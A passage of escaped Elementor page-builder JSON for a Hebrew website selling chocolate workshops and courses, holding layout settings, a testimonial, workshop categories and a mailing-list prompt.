\\u05ea\\u05d5\\u05de\\u05d5, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05e0\\u05e2\\u05e9\\u05d4 \\u05d9\\u05d5\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd?<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05e6\\u05e8\\u05d5 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05e8\\u05d2\\u05e2\\u05d9\\u05dd \\u05d4\\u05d0\\u05dc\\u05d4, \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05d4\\u05d2\\u05d9\\u05e2 \\\"\\u05db\\u05de\\u05e2\\u05d8 \\u05e9\\u05d1\\u05e2\\u05d9\\u05dd\\\" \\u05d5\\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05de\\u05d2\\u05d5\\u05d5\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05e9\\u05e1\\u05d5\\u05d1\\u05d1\\u05d9\\u05dd \\u05e1\\u05d1\\u05d9\\u05d1 \\u05d4\\u05d0\\u05d5\\u05db\\u05dc \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1 \\u05e2\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d4\\u05d7\\u05dc \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05d6\\u05dc, \\u05d4\\u05db\\u05dc \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9 \\u05dc\\u05de\\u05d3\\u05d9 \\u05d1\\u05db\\u05dc \\u05e6\\u05d5\\u05e8\\u05d4 \\u05d5\\u05e6\\u05d1\\u05e2, \\u05db\\u05dc \\u05d3\\u05e8\\u05da \\u05d5\\u05e9\\u05e2\\u05d4.\\u00a0<\\/p>\",\"text_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1.6\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"17\"},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"15f91cbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"44.298\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_position\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"385ae28\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/inner-hp.jpg\",\"id\":26}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4477cb\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"25\",\"bottom\":\"50\",\"left\":\"25\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"20\",\"bottom\":\"60\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"702ee38f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"60600fc4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"f9b0ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"6945b5b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":31,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-woman.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"fa7a00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"afa7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":28,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-company.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4a4b992\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"c498248\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":30,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-kids.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5684ff50\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"id\":91,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/BG.jpg\"},\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#190606\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.75},\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"115\",\"bottom\":\"50\",\"left\":\"115\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"74663cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"125f3fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05de\\u05d4 \\u05d4\\u05e9\\u05d1\\u05e2\\u05d9\\u05dd \\u05d4\\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd\",\"align\":\"center\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":53},\"typography_font_weight\":\"400\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"43\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"40\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6410b809\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"caption\":\"\\u05e0\\u05ea\\u05d9 \\u05d5\\u05d2\\u05d1\\u05e8\\u05d9\\u05d0\\u05dc\\u05d4 \\u05de\\u05e8\\u05d0\\u05e9\\u05d5\\u05df \\u05dc\\u05e6\\u05d9\\u05d5\\u05df\",\"text_color\":\"#cccccc\",\"caption_typography_typography\":\"custom\",\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":13},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c4e5757\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\\"\\u05ea\\u05de\\u05d9\\u05d3 \\u05d0\\u05d4\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d0\\u05e3 \\u05e4\\u05e2\\u05dd \\u05dc\\u05d0 \\u05d7\\u05e9\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d0\\u05e0\\u05d9 \\u05d0\\u05ea\\u05e8\\u05d2\\u05e9 \\u05db\\u05dc \\u05db\\u05da \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05dc\\u05dd \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7. \\u05ea\\u05d5\\u05d3\\u05d4 \\u05e8\\u05d1\\u05d4 \\u05dc\\u05e6\\u05d5\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3 \\u05e9\\u05e2\\u05d6\\u05e8 \\u05dc\\u05d9 \\u05dc\\u05de\\u05e6\\u05d5\\u05d0 \\u05d0\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea!\\\"\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":27},\"typography_font_weight\":\"400\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"17\",\"bottom\":\"0\",\"left\":\"17\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"25\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"25\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"typography_font_style\":\"italic\",\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c25e365\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26},\"typography_font_weight\":\"normal\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_text_color\":\"#40272c\",\"background_color\":\"#edd0a8\",\"border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"50\",\"bottom\":\"20\",\"left\":\"50\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"15\"},\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#5c0011\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"43f8ef8f\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"39181ab4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"10694622\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5212b57b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2b9dc682\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"50c468d5\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"3003b83\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"45bcecca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37f8a4fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"285e10d7\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"24484b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"33814887\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48098d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span 